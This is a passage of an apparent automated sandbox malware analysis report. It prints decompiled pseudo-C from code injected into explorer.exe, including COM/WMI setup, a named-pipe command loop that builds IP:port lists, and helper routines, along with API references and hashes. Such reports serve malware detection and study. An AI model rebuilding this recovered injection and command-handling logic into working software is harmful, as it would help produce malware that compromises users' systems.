                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t16 = 0;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					__imp__#2(__ecx);
                                                                                                                                                                                              					_t25 = _v12;
                                                                                                                                                                                              					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                                              					if(_t21 < 0) {
                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                                              						if(_t21 < 0) {
                                                                                                                                                                                              							goto L5;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t16 = E02F88BDE(8);
                                                                                                                                                                                              							if(_t16 == 0) {
                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                                              								 *_t16 = _v8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t16;
                                                                                                                                                                                              			}













                                                                                                                                                                                              0x02f8e4b3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E413
                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E424
                                                                                                                                                                                              • CoCreateInstance.OLE32(02F9C868,00000000,00000001,02F9C878,?,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E43B
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 02F8E446
                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,02F8E731,000009DA,00000000,?,00000000), ref: 02F8E471
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1610782348-0
                                                                                                                                                                                              • Opcode ID: 0c4d0741155fb9f7966b0c4a480747db10200aa2137f59a1d5b646d45f56bba4
                                                                                                                                                                                              • Instruction ID: fa620f71f6b68ad466a750fe500003f79915bdbd77402ba26b9c439efbbf0926
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c4d0741155fb9f7966b0c4a480747db10200aa2137f59a1d5b646d45f56bba4
                                                                                                                                                                                              • Instruction Fuzzy Hash: F8214F74B40245BBEB249B63CD4DE5BBF7CEFC6B55F10419DB605A6290C6709A40CA30
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E02F93379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                                              				signed int _t12;
                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                              				char* _t31;
                                                                                                                                                                                              				char* _t33;
                                                                                                                                                                                              				char* _t35;
                                                                                                                                                                                              				char* _t37;
                                                                                                                                                                                              				char* _t38;
                                                                                                                                                                                              				long long* _t40;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t30 = __edi;
                                                                                                                                                                                              				_t12 = _a20;
                                                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                                                              					_t12 = 0x11;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t35 = _a4;
                                                                                                                                                                                              				_push(_t25);
                                                                                                                                                                                              				 *_t40 = _a12;
                                                                                                                                                                                              				_push(_t12);
                                                                                                                                                                                              				_push("%.*g");
                                                                                                                                                                                              				_push(_a8);
                                                                                                                                                                                              				_push(_t35);
                                                                                                                                                                                              				L02F934D2();
                                                                                                                                                                                              				_t23 = _t12;
                                                                                                                                                                                              				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                                              					L16:
                                                                                                                                                                                              					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					E02F93352(_t12, _t35);
                                                                                                                                                                                              					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						_push(_t30);
                                                                                                                                                                                              						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                                              						_t31 = _t37;
                                                                                                                                                                                              						if(_t37 == 0) {
                                                                                                                                                                                              							L15:
                                                                                                                                                                                              							_t13 = _t23;
                                                                                                                                                                                              							L17:
                                                                                                                                                                                              							return _t13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t38 = _t37 + 1;
                                                                                                                                                                                              						_t33 = _t31 + 2;
                                                                                                                                                                                              						if( *_t38 == 0x2d) {
                                                                                                                                                                                              							_t38 = _t33;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						while( *_t33 == 0x30) {
                                                                                                                                                                                              							_t33 = _t33 + 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t33 != _t38) {
                                                                                                                                                                                              							E02F88CE0(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                                              							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t6 = _t23 + 3; // 0x2f91b64
                                                                                                                                                                                              						_t12 = _t6;
                                                                                                                                                                                              						if(_t12 >= _a8) {
                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t35[_t23] = 0x302e;
                                                                                                                                                                                              						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                                              						_t23 = _t23 + 2;
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}














                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: strchr$_snprintf
                                                                                                                                                                                              • String ID: %.*g
                                                                                                                                                                                              • API String ID: 3619936089-952554281
                                                                                                                                                                                              • Opcode ID: 1958502515e15b7150740f3d6680f5a3b1f3ebd0d95c1ab581355db76e65d943
                                                                                                                                                                                              • Instruction ID: b3ce14b2a9902c61c6fe5cc32fbe3e1b046fc641ddd6e117a28450e1949ef8fa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1958502515e15b7150740f3d6680f5a3b1f3ebd0d95c1ab581355db76e65d943
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3215772B4561527FF325A1CDD81F9A3B8CAF463E4F5A40E5FB449A280E7B1DD408790
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                              			E02F8377F(void* __fp0) {
                                                                                                                                                                                              				signed int _v144;
                                                                                                                                                                                              				signed int _v152;
                                                                                                                                                                                              				char _v160;
                                                                                                                                                                                              				char _v164;
                                                                                                                                                                                              				char _v168;
                                                                                                                                                                                              				signed int _v172;
                                                                                                                                                                                              				char _v176;
                                                                                                                                                                                              				intOrPtr _v180;
                                                                                                                                                                                              				signed int _v184;
                                                                                                                                                                                              				signed int _v188;
                                                                                                                                                                                              				signed int _v192;
                                                                                                                                                                                              				signed int _v196;
                                                                                                                                                                                              				char _v200;
                                                                                                                                                                                              				signed int _v204;
                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				signed int _t80;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                                              				signed int _t87;
                                                                                                                                                                                              				signed int _t88;
                                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                                              				void* _t102;
                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                              				unsigned int* _t104;
                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                              				signed int _t113;
                                                                                                                                                                                              				void* _t118;
                                                                                                                                                                                              				intOrPtr _t124;
                                                                                                                                                                                              				signed int _t127;
                                                                                                                                                                                              				intOrPtr _t129;
                                                                                                                                                                                              				intOrPtr _t132;
                                                                                                                                                                                              				void* _t133;
                                                                                                                                                                                              				void* _t137;
                                                                                                                                                                                              				signed int _t146;
                                                                                                                                                                                              				signed int _t148;
                                                                                                                                                                                              				signed short* _t149;
                                                                                                                                                                                              				signed int _t159;
                                                                                                                                                                                              				intOrPtr* _t183;
                                                                                                                                                                                              				void* _t187;
                                                                                                                                                                                              				void* _t188;
                                                                                                                                                                                              				void* _t189;
                                                                                                                                                                                              				signed short* _t192;
                                                                                                                                                                                              				void* _t196;
                                                                                                                                                                                              				signed int _t199;
                                                                                                                                                                                              				signed int _t200;
                                                                                                                                                                                              				signed int _t203;
                                                                                                                                                                                              				signed int _t204;
                                                                                                                                                                                              				char _t205;
                                                                                                                                                                                              				signed int _t206;
                                                                                                                                                                                              				void* _t208;
                                                                                                                                                                                              				void* _t214;
                                                                                                                                                                                              				void* _t221;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t221 = __fp0;
                                                                                                                                                                                              				_t208 = (_t206 & 0xfffffff8) - 0xac;
                                                                                                                                                                                              				_v144 = 0;
                                                                                                                                                                                              				_v172 = 0;
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t72 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( *0x2f9f804);
                                                                                                                                                                                              					_v152 = 0;
                                                                                                                                                                                              					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v160);
                                                                                                                                                                                              					_t75 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					_push(0x80000);
                                                                                                                                                                                              					_push( *0x2f9f8bc);
                                                                                                                                                                                              					_push( *0x2f9f804);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
                                                                                                                                                                                              						GetLastError();
                                                                                                                                                                                              						goto L56;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t149 =  *0x2f9f8bc; // 0x0
                                                                                                                                                                                              						_t80 =  *_t149 & 0x0000ffff;
                                                                                                                                                                                              						_t214 = _t80 - 8;
                                                                                                                                                                                              						if(_t214 > 0) {
                                                                                                                                                                                              							_t81 = _t80 - 9;
                                                                                                                                                                                              							__eflags = _t81;
                                                                                                                                                                                              							if(_t81 == 0) {
                                                                                                                                                                                              								E02F90962( &_v200);
                                                                                                                                                                                              								L12:
                                                                                                                                                                                              								_t84 =  &_v200;
                                                                                                                                                                                              								L13:
                                                                                                                                                                                              								_push(4);
                                                                                                                                                                                              								L14:
                                                                                                                                                                                              								_push(_t84);
                                                                                                                                                                                              								_push(5);
                                                                                                                                                                                              								L31:
                                                                                                                                                                                              								_pop(_t187);
                                                                                                                                                                                              								E02F8D1A6(_t187);
                                                                                                                                                                                              								L32:
                                                                                                                                                                                              								L56:
                                                                                                                                                                                              								DisconnectNamedPipe( *0x2f9f804);
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								_pop(0);
                                                                                                                                                                                              								if(_v172 == 0) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t87 = _t81;
                                                                                                                                                                                              							__eflags = _t87;
                                                                                                                                                                                              							if(_t87 == 0) {
                                                                                                                                                                                              								_v204 = 0;
                                                                                                                                                                                              								_t88 = E02F8171A( &_v204, _t221);
                                                                                                                                                                                              								_v188 = _t88;
                                                                                                                                                                                              								__eflags = _t88;
                                                                                                                                                                                              								if(_t88 == 0) {
                                                                                                                                                                                              									_push(4);
                                                                                                                                                                                              									_v192 = 0;
                                                                                                                                                                                              									_push( &_v192);
                                                                                                                                                                                              									L19:
                                                                                                                                                                                              									_push(0xa);
                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t146 = _v204;
                                                                                                                                                                                              								_t90 = _t146 * 0x16;
                                                                                                                                                                                              								_v184 = _t146 * 0x16;
                                                                                                                                                                                              								_t203 = E02F88BDE(_t90);
                                                                                                                                                                                              								_v192 = _t203;
                                                                                                                                                                                              								__eflags = _t203;
                                                                                                                                                                                              								if(_t203 == 0) {
                                                                                                                                                                                              									_t64 =  &_v192;
                                                                                                                                                                                              									 *_t64 = _v192 & 0x00000000;
                                                                                                                                                                                              									__eflags =  *_t64;
                                                                                                                                                                                              									_push(4);
                                                                                                                                                                                              									_push( &_v192);
                                                                                                                                                                                              									_t188 = 0xa;
                                                                                                                                                                                              									E02F8D1A6(_t188);
                                                                                                                                                                                              									L52:
                                                                                                                                                                                              									E02F88BF4( &_v188, _t146);
                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t199 = 0;
                                                                                                                                                                                              								__eflags = _t146;
                                                                                                                                                                                              								if(_t146 == 0) {
                                                                                                                                                                                              									L50:
                                                                                                                                                                                              									_push(E02F8A43D(_t203));
                                                                                                                                                                                              									_push(_t203);
                                                                                                                                                                                              									_t189 = 5;
                                                                                                                                                                                              									E02F8D1A6(_t189);
                                                                                                                                                                                              									E02F88BF4( &_v192, 0xffffffff);
                                                                                                                                                                                              									_t208 = _t208 + 0x10;
                                                                                                                                                                                              									goto L52;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t159 = _v188 + 4;
                                                                                                                                                                                              								__eflags = _t159;
                                                                                                                                                                                              								_v204 = _t159;
                                                                                                                                                                                              								do {
                                                                                                                                                                                              									__eflags = _t199;
                                                                                                                                                                                              									if(_t199 != 0) {
                                                                                                                                                                                              										__eflags = _t199 - _t146 - 1;
                                                                                                                                                                                              										if(_t199 < _t146 - 1) {
                                                                                                                                                                                              											_t102 = E02F8A43D(_t203);
                                                                                                                                                                                              											_t159 = _v204;
                                                                                                                                                                                              											 *((short*)(_t102 + _t203)) = 0x3b;
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t100 =  *_t159;
                                                                                                                                                                                              									_v196 = _t100;
                                                                                                                                                                                              									__eflags = _t100;
                                                                                                                                                                                              									if(_t100 != 0) {
                                                                                                                                                                                              										_t103 = E02F8A43D(_t203);
                                                                                                                                                                                              										_t104 = _v204;
                                                                                                                                                                                              										_push(_t104[1] & 0x0000ffff);
                                                                                                                                                                                              										_push( *_t104 >> 0x18);
                                                                                                                                                                                              										_push(_t104[0] & 0x000000ff);
                                                                                                                                                                                              										_push(_t104[0] & 0x000000ff);
                                                                                                                                                                                              										_t110 = E02F8A43D(_t203) + _t203;
                                                                                                                                                                                              										__eflags = _t110;
                                                                                                                                                                                              										E02F89E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
                                                                                                                                                                                              										_t159 = _v204;
                                                                                                                                                                                              										_t208 = _t208 + 0x20;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t199 = _t199 + 1;
                                                                                                                                                                                              									_t159 = _t159 + 0x20;
                                                                                                                                                                                              									_v204 = _t159;
                                                                                                                                                                                              									__eflags = _t199 - _t146;
                                                                                                                                                                                              								} while (_t199 < _t146);
                                                                                                                                                                                              								goto L50;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t87 != 1;
                                                                                                                                                                                              							if(_t87 != 1) {
                                                                                                                                                                                              								goto L56;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = 0;
                                                                                                                                                                                              							_t113 = E02F8171A( &_v204, _t221);
                                                                                                                                                                                              							_t204 = _v204;
                                                                                                                                                                                              							_v196 = _t113;
                                                                                                                                                                                              							__eflags = _t113;
                                                                                                                                                                                              							if(_t113 != 0) {
                                                                                                                                                                                              								E02F88BF4( &_v196, _t204);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = _t204 * 0x16;
                                                                                                                                                                                              							_t84 =  &_v204;
                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t214 == 0) {
                                                                                                                                                                                              							_t84 = E02F90962( &_v200);
                                                                                                                                                                                              							L16:
                                                                                                                                                                                              							__eflags = _t84;
                                                                                                                                                                                              							if(_t84 == 0) {
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								goto L19;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_push(_v200);
                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t118 = _t80 - 1;
                                                                                                                                                                                              						if(_t118 == 0) {
                                                                                                                                                                                              							_t200 = E02F89B33( &(_t149[4]), 0x20, 1,  &_v176);
                                                                                                                                                                                              							_v196 = _t200;
                                                                                                                                                                                              							__eflags = _t200;
                                                                                                                                                                                              							if(_t200 == 0) {
                                                                                                                                                                                              								L30:
                                                                                                                                                                                              								_t192 =  *0x2f9f8bc; // 0x0
                                                                                                                                                                                              								E02F89EDB( &_v164,  &(_t192[4]), 0x80);
                                                                                                                                                                                              								_push(0x84);
                                                                                                                                                                                              								_push( &_v168);
                                                                                                                                                                                              								_push(2);
                                                                                                                                                                                              								goto L31;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t205 = _v176;
                                                                                                                                                                                              							__eflags = _t205 - 1;
                                                                                                                                                                                              							if(__eflags <= 0) {
                                                                                                                                                                                              								_t124 = E02F81DD3(E02F89F6F( *_t200, __eflags), 0, 0, 0);
                                                                                                                                                                                              								_t208 = _t208 + 0x10;
                                                                                                                                                                                              								_v168 = _t124;
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t125 = _t205 - 1;
                                                                                                                                                                                              							_v184 = _t205 - 1;
                                                                                                                                                                                              							_t127 = E02F88BDE(_t125 << 2);
                                                                                                                                                                                              							_v188 = _t127;
                                                                                                                                                                                              							__eflags = _t127;
                                                                                                                                                                                              							if(_t127 == 0) {
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t148 = 1;
                                                                                                                                                                                              							__eflags = _t205 - 1;
                                                                                                                                                                                              							if(__eflags <= 0) {
                                                                                                                                                                                              								L28:
                                                                                                                                                                                              								_t129 = E02F81DD3(E02F89F6F( *_t200, __eflags), _t127, _v184, 0);
                                                                                                                                                                                              								_t208 = _t208 + 0x10;
                                                                                                                                                                                              								_v168 = _t129;
                                                                                                                                                                                              								E02F89C2C( &_v176);
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = _t127;
                                                                                                                                                                                              							do {
                                                                                                                                                                                              								_t132 = E02F89880( *((intOrPtr*)(_t200 + _t148 * 4)), E02F8A43D( *((intOrPtr*)(_t200 + _t148 * 4))));
                                                                                                                                                                                              								_t183 = _v204;
                                                                                                                                                                                              								_t148 = _t148 + 1;
                                                                                                                                                                                              								 *_t183 = _t132;
                                                                                                                                                                                              								_v204 = _t183 + 4;
                                                                                                                                                                                              								__eflags = _t148 - _t205;
                                                                                                                                                                                              							} while (__eflags < 0);
                                                                                                                                                                                              							_t127 = _v188;
                                                                                                                                                                                              							goto L28;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t133 = _t118 - 3;
                                                                                                                                                                                              						if(_t133 == 0) {
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_t196 = 5;
                                                                                                                                                                                              							E02F85EC3(E02F8D1A6(_t196));
                                                                                                                                                                                              							_v172 = 1;
                                                                                                                                                                                              							goto L56;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t137 = _t133;
                                                                                                                                                                                              						if(_t137 == 0) {
                                                                                                                                                                                              							_t84 = E02F90940( &_v200);
                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t137 != 1) {
                                                                                                                                                                                              							goto L56;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E02F90940( &_v200);
                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}
                                                                                                                                                                                              0x02f83858
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83858
                                                                                                                                                                                              0x02f83851
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83851
                                                                                                                                                                                              0x02f83810
                                                                                                                                                                                              0x02f83813
                                                                                                                                                                                              0x02f8388f
                                                                                                                                                                                              0x02f83891
                                                                                                                                                                                              0x02f83897
                                                                                                                                                                                              0x02f83899
                                                                                                                                                                                              0x02f83936
                                                                                                                                                                                              0x02f83936
                                                                                                                                                                                              0x02f83948
                                                                                                                                                                                              0x02f8394e
                                                                                                                                                                                              0x02f83957
                                                                                                                                                                                              0x02f83958
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83958
                                                                                                                                                                                              0x02f8389f
                                                                                                                                                                                              0x02f838a3
                                                                                                                                                                                              0x02f838a6
                                                                                                                                                                                              0x02f8392a
                                                                                                                                                                                              0x02f8392f
                                                                                                                                                                                              0x02f83932
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83932
                                                                                                                                                                                              0x02f838a8
                                                                                                                                                                                              0x02f838ab
                                                                                                                                                                                              0x02f838b3
                                                                                                                                                                                              0x02f838b8
                                                                                                                                                                                              0x02f838bd
                                                                                                                                                                                              0x02f838bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f838c3
                                                                                                                                                                                              0x02f838c4
                                                                                                                                                                                              0x02f838c6
                                                                                                                                                                                              0x02f838f5
                                                                                                                                                                                              0x02f83904
                                                                                                                                                                                              0x02f83909
                                                                                                                                                                                              0x02f8390c
                                                                                                                                                                                              0x02f83918
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83918
                                                                                                                                                                                              0x02f838c8
                                                                                                                                                                                              0x02f838cc
                                                                                                                                                                                              0x02f838da
                                                                                                                                                                                              0x02f838df
                                                                                                                                                                                              0x02f838e3
                                                                                                                                                                                              0x02f838e4
                                                                                                                                                                                              0x02f838e9
                                                                                                                                                                                              0x02f838ed
                                                                                                                                                                                              0x02f838ed
                                                                                                                                                                                              0x02f838f1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f838f1
                                                                                                                                                                                              0x02f83815
                                                                                                                                                                                              0x02f83818
                                                                                                                                                                                              0x02f83860
                                                                                                                                                                                              0x02f83861
                                                                                                                                                                                              0x02f83864
                                                                                                                                                                                              0x02f8386c
                                                                                                                                                                                              0x02f83871
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83871
                                                                                                                                                                                              0x02f8381b
                                                                                                                                                                                              0x02f8381e
                                                                                                                                                                                              0x02f83847
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83847
                                                                                                                                                                                              0x02f83823
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8382e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8382e
                                                                                                                                                                                              0x02f837e7
                                                                                                                                                                                              0x02f83b1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02F837B2
                                                                                                                                                                                                • Part of subcall function 02F8D1A6: FlushFileBuffers.KERNEL32(00000000,?,02F83AC6,00000000,00000004), ref: 02F8D1EC
                                                                                                                                                                                              • DisconnectNamedPipe.KERNEL32 ref: 02F83B03
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                                              • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                                              • API String ID: 465096328-3858738763
                                                                                                                                                                                              • Opcode ID: 283cd8290d873d1603c558deb4b937e6f0e6b9d24f8b9316c0e596715ea396bc
                                                                                                                                                                                              • Instruction ID: d2c3ee0a56e1cfdd498bb4f6371d388a47dc85c021b4e6361685d70c8b3b0109
                                                                                                                                                                                              • Opcode Fuzzy Hash: 283cd8290d873d1603c558deb4b937e6f0e6b9d24f8b9316c0e596715ea396bc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33A1BDB2A08305AFE314FF24CC84E2AF7E9EB84B94F44495EF65596290EB34D905CF52
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                                                              			E02F94100(int _a4, signed int _a8) {
                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* _t137;
                                                                                                                                                                                              				signed int _t141;
                                                                                                                                                                                              				intOrPtr* _t142;
                                                                                                                                                                                              				signed int _t145;
                                                                                                                                                                                              				signed int _t146;
                                                                                                                                                                                              				intOrPtr _t151;
                                                                                                                                                                                              				intOrPtr _t161;
                                                                                                                                                                                              				intOrPtr _t162;
                                                                                                                                                                                              				intOrPtr _t167;
                                                                                                                                                                                              				intOrPtr _t170;
                                                                                                                                                                                              				signed int _t172;
                                                                                                                                                                                              				intOrPtr _t173;
                                                                                                                                                                                              				int _t184;
                                                                                                                                                                                              				intOrPtr _t185;
                                                                                                                                                                                              				intOrPtr _t188;
                                                                                                                                                                                              				signed int _t189;
                                                                                                                                                                                              				void* _t195;
                                                                                                                                                                                              				int _t202;
                                                                                                                                                                                              				int _t208;
                                                                                                                                                                                              				intOrPtr _t217;
                                                                                                                                                                                              				signed int _t218;
                                                                                                                                                                                              				int _t219;
                                                                                                                                                                                              				intOrPtr _t220;
                                                                                                                                                                                              				signed int _t221;
                                                                                                                                                                                              				signed int _t222;
                                                                                                                                                                                              				int _t224;
                                                                                                                                                                                              				int _t225;
                                                                                                                                                                                              				signed int _t227;
                                                                                                                                                                                              				intOrPtr _t228;
                                                                                                                                                                                              				int _t232;
                                                                                                                                                                                              				int _t234;
                                                                                                                                                                                              				signed int _t235;
                                                                                                                                                                                              				int _t239;
                                                                                                                                                                                              				void* _t240;
                                                                                                                                                                                              				int _t245;
                                                                                                                                                                                              				int _t252;
                                                                                                                                                                                              				signed int _t253;
                                                                                                                                                                                              				int _t254;
                                                                                                                                                                                              				void* _t257;
                                                                                                                                                                                              				void* _t258;
                                                                                                                                                                                              				int _t259;
                                                                                                                                                                                              				intOrPtr _t260;
                                                                                                                                                                                              				int _t261;
                                                                                                                                                                                              				signed int _t269;
                                                                                                                                                                                              				signed int _t271;
                                                                                                                                                                                              				intOrPtr* _t272;
                                                                                                                                                                                              				void* _t273;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t253 = _a8;
                                                                                                                                                                                              				_t272 = _a4;
                                                                                                                                                                                              				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                              				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              				_t228 =  *_t4;
                                                                                                                                                                                              				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                                              				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                                              				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                                              				_t269 = 0;
                                                                                                                                                                                              				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                                              				asm("o16 nop [eax+eax]");
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t8 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                                              					_v12 = 0xffff;
                                                                                                                                                                                              					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                                              					if(_t217 < _t141) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t11 = _t272 + 0x6c; // 0xa1ec8b55
